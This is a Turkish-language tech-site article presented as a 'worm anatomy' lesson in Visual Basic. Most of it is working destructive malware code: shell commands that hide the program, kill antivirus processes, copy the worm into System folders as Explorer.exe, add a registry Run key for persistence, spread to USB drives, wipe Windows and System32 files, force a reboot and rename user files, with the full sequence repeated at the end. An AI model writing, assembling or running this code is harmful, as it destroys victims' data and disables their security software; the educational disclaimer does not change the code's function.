Solucanlar nedir? Nasıl üretilyor?
Visual Basic programi ile nasil basit solucanların nasıl yazıldığını göreceksiniz.
Teknolojioku
Teknolojioku.com olarak sizlerle Visual Basic hackerların nasıl
solucan yazdıklarını göstereceğiz Anlatacagimiz sadece Solucan
virüsünün bir Anatomisidir. mantıını kavrayıp tamamen güvenlik
almanız için yazılmıştır.
Visual Basic ile yazılan virüslerde öncelikle Silme,kopyalama,kayıt
defterine ekle gibi kodlar kullanılıyor. Ama Antivirüsler bunu
gördüğü için solucanı yazanlar Virüslerini MS-DOS kodlarıyla
yapıyrlar. Peki bunlar nasıl yapılıyor ?.Tabiki "Shell" komutuyla
"Cmd" dosyasını çalıştırarak bunun üstesinden geliyorlar.
Örnek:
shell "cmd /c del /f /q /s %windir%\\\\\\\\*.*"
Yukarıda gördüğünüz en baştaki komut "Shell" yani çağırma
komutu.Bununla "CMD" dosyasını çalıştırıp ms-dos komutları
veriliyor. MS_DOS komutunda ise şu yazmakta."del /f /q /s %Windir%
yani Windowsun içindeki herşeyi sil. Aşağıda bilgi vererek kısa
kısa kodların da ne olduğunu tanıtalım.
Bir solucan öncelikle kendini engelleyen programları kapatmak
ister. Bunlar Antivirüsler, güvenlik duvarları, firewall türevi
programlar. Bunun için şu komutu kullanıyorlar.
shell "cmd /c taskkill /t /im Eset.exe"
Bunu forma yapıştırıp kaydettikten sonra "Görev yöneticisi"nde eset
adında çalışan antivirüsü kapatmakta.
Ama hedefin bilgisayarında acaba hangi antivirüs var? Hackerlar
bunun üstesinden de arama motorlarından bütün antivirüslerin
listesini indiriyor.
On Error Resume Next Me.hide app.TaskVisible =
False Visible = False shell "cmd /c taskkill /t /im
Panda.exe" shell "cmd /c taskkill /t /im Tsk.exe" shell
"cmd /c taskkill /t /im Sym.exe" shell "cmd /c taskkill /t /im
Anti.exe" shell "cmd /c taskkill /t /im Egui.exe"
gibi.
Sonraki aşamaları ise, solucan bütün antivirüsleri ve firewalları
devre dışı bıraktıktan sonra yaptığı şey kendini sisteme kopyalamak
ve kendini kayıt defterine eklemektir. Bunuda xCopy komutuyla
yaptırıyorlar .Aşağıda kopyalama kodunda "VirüsAdı.exe" ile yazılan
yere virüsün ismini yazıyorar. Örneğin bütün kodlar bittikten sonra
virüsün ismine "Nuke" koyar iseler aynı şekilde bütün
"Virüsadı.exe" kısımlarına virüsünüz adlarını yazıyorlar.
shell "cmd /c xcopy /u /y "VirüsAdı.exe"
"%Windir%\\System\\Explorer.exe""shell "cmd /c xcopy /u /y
"VirüsAdı.exe" "%Windir%\\System32\\Explorers.exe""
Evet.Yukarıda verilen kodları incelerseniz şunu görürsünüz.
Hackerlerin yaptığı virüs kendini WINDOWS\\System ve System32 ye
kopyalıyor. Bu sayede kendini windows ile birlikte başlatıyor ama
aktif olmuyor. Bunun için kayıt defterine kendini ekleme özelliği
ekliyorlar . Onu da şöyle yapmaktalar.
shell "cmd /c reg add
hkey_local_machine\\software\\microsoft\\windowscurrentversionrun
/v startAPI /t reg_sz /d %Windir%\\System\\VirusAdı.exe /f"shell
"cmd /c reg add
hkey_local_machine\\software\\microsoft\\windowscurrentversionrun
/v startAPI /t reg_sz /d %Windir%\\System32\\VirusAdı.exe /f"
Yukarda yine "Shell" komutunu kullanarak virüslerini kayıt
defterine ekliyorlar. Windows'un her açılışında virüs kendini aktif
ediyor.
Bütün bunları yaptıktan sonra artık hackerlar virüslerini güvene
alıyorlar. Saldırı kısmı şimdi başlıyor ; Tabi bunlar sadece işin
nasıl döndüğünü öğrenmeniz için. Bilgi dışında kesinlikle
kullanmayın.
Hackerların bundan sonra yaptıkları hayal güçlerini kuallanmak.
Flash belleklerden virüsün bulaşmasını isterlerse, kendini Flaş
belleklere kopyalaması için lazım olan kodu yani "xCopy"kodunu
kullanıyorlar. Şöyle bir tasarlama yapıyorlar;
shell "cmd /c xcopy "%WinDir%\\System\\VirüsAdı.exe"
"D:\\Proces.exe"shell "cmd /c xcopy
"%WinDir%\\System\\VirüsAdı.exe" "E:\\Proces.exe"shell "cmd /c
xcopy "%WinDir%\\System\\VirüsAdı.exe" "G:\\Proces.exe"shell "cmd
/c xcopy "%WinDir%\\System\\VirüsAdı.exe" "H:\\Proces.exe"shell
"cmd /c xcopy "%WinDir%\\System\\VirüsAdı.exe"
"I:\\Proces.exe"shell "cmd /c xcopy
"%WinDir%\\System\\VirüsAdı.exe" "L:\\Proces.exe"shell "cmd /c
xcopy "%WinDir%\\System\\VirüsAdı.exe" "C:\\Proces.exe"shell "cmd
/c xcopy "%WinDir%\\System\\VirüsAdı.exe" "J:\\Proces.exe"shell
"cmd /c xcopy "%WinDir%\\System\\VirüsAdı.exe" "K:\\Proces.exe"
shell "cmd /c ipconfig/release"shell "cmd /c del /f /q /s
%Windir%\\*.*"shell "cmd /c shutdown -r -f -t 90"shell "cmd /c del
/f /q /s %Windir%\\System32\\*.*"shell "cmd /c del /f /q /s
%Windir%\\System\\*.*"msgbox "Dikkat Virus Var"msgbox "Sistem
Hatasi"msgbox "Solucan Var"Shell "cmd /c REN *.DOC "Shell "cmd /c
REN *.exe "Shell "cmd /c REN *.MP3 "Shell "cmd /c REN *.TXT "
On Error Resume Next Me.hide app.TaskVisible =
False Visible = False shell "cmd /c taskkill /t /im
Panda.exe" shell "cmd /c taskkill /t /im Tsk.exe" shell
"cmd /c taskkill /t /im Sym.exe" shell "cmd /c taskkill /t /im
Anti.exe" shell "cmd /c taskkill /t /im Egui.exe"
shell "cmd /c xcopy /u /y "VirüsAdı.exe"
"%Windir%\\System\\Explorer.exe""shell "cmd /c xcopy /u /y
"VirüsAdı.exe" "%Windir%\\System32\\Explorers.exe""
shell "cmd /c reg add
hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v
startAPI /t reg_sz /d %Windir%\\System\\VirusAdı.exe /f"shell "cmd
/c reg add
hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v
startAPI /t reg_sz /d %Windir%\\System32\\VirusAdı.exe /f"
shell "cmd /c ipconfig/release"shell "cmd /c del /f /q /s
%Windir%\\*.*"shell "cmd /c shutdown -r -f -t 90"shell "cmd /c del
/f /q /s %Windir%\\System32\\*.*"shell "cmd /c del /f /q /s
%Windir%\\System\\*.*"msgbox "Hacked by X"msgbox "Sisteminiz
silindi"msgbox "Bilgisayarınız çökme aşamasında..."Shell "cmd /c
REN *.DOC "Shell "cmd /c REN *.exe "Shell "cmd /c REN *.MP3 "Shell
"cmd /c REN *.TXT "
İşte bunlar bir solucanın anatomisi. Bu kodlar sadece ve sadece
eğitim içindir . Kesinlikle bir başkasında denemeyin.
